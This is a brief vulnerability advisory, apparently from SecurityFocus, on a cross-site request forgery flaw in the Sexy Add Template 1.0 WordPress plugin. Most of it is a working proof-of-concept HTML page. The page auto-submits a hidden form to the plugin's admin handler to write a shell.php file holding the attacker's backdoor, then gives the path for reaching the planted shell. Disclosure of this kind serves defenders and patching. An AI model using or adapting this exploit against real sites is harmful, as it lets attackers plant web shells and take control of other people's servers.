source: https://www.securityfocus.com/bid/55666/info
The Sexy Add Template plugin for WordPress is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.
Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.
Sexy Add Template 1.0is vulnerable; other versions may also be affected.################################################################################### [ Information Details ]# - WordPress Plugin Sexy Add Template:# Attacker allow CSRF Upload Shell.# http://localhost/wp-admin/themes.php?page=AM-sexy-handle <--- Vuln CSRF, not require verification CODE "wpnonce".## <html># <head># <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"># <title>Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability</title># </head># <body onload="document.form0.submit();"># <form method="POST" name="form0" action="http://localhost/wp-admin/themes.php?page=AM-sexy-handle" method="post" enctype="multipart/form-data" ># <input type="hidden" name="newfile" value="yes" /> # <input type="hidden" type="text" value="shell.php" name="AM_filename"># <textarea type="hidden" name="AM_file_content"># [ Your Script Backdoor/Shell ]# </textarea># </form># </body># </html>## - Access Shell:# http://www.example.com/wp-content/themes/[theme-name]/shell.php <--- HACKED...!!!## +#################################################################################